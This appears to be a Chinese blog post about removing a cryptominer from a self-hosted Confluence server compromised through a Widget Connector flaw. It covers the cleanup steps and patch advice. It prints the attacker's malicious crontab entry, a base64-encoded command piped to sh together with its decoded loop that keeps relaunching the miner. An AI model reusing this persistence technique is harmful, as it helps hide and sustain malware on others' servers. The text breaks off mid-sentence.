自己安装了conference,没用1周。发现服务器内存被吃完了。
定位问题:
1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒
2、感谢 https://www.cnblogs.com/hack404/p/11464890.html 作者的帮助。
处理过程:
1. 先封掉外网HTTP 端口
使用腾讯云控制台 安全组 设置80端口不允许访问。
2. 查杀进程
使用命令:top 查看pid 并使用 kill -9 ‘pid’
发现进程越杀越多,继续看文档。
3.查看是否存在定时任务
使用命令:crontab -l
发现这些是 腾讯云的定时任务。
再使用命令: crontab -l -u confluence2 查看
发现与文档一样的定时任务
* * * * * echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCAyNzMxNiA+L2Rldi9udWxsIDI+JjEgOyB0aGVuIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9ya3dwcm4gOyBmaSA7IGRvbmUgKSAmIHBpZD0kISA7IChzbGVlcCAyNSAmJiBraWxsIC05ICRwaWQpICY=" | base64 -d | sh >/dev/null 2>&1
base64 解密为:
( while : ; do sleep 5 ; if ! kill -0 27316 >/dev/null 2>&1 ; then rkwprn ; fi ; done ) & pid=$! ; (sleep 25 && kill -9 $pid) &
我的神,死循环怪不得CPU 那么高。。。
4.杀死定时任务
使用命令:crontab -r -u confluence2
查询定时任务为空
5.清除/tmp/下所有confluence2 用户创建的目录
该目录为病毒文件
6.清除/opt/atlassian/confluence/temp/ 下所有confluence2 用户创建的目录
不是非常清楚是什么文件。应该是攻击confluence 的病毒文件
7.升级confluence
安全建议
以下任选一种皆可修复漏洞
a、升级至安全版本。下载链接:
https://www.atlassian.com/software/confluence/download/
https://atlassian.com/software/confluence/download/data-center
b、升级Widget Connector 组件。
Linux系统运行如下命令查找widgetconnector-*.jar文件所在位置:
find / -name "widgetconnector-*"
下载最新版本的widgetconnector-3.1.4.jar替换,并重启Confluence应用
我们选用的是 B方案 替换 ja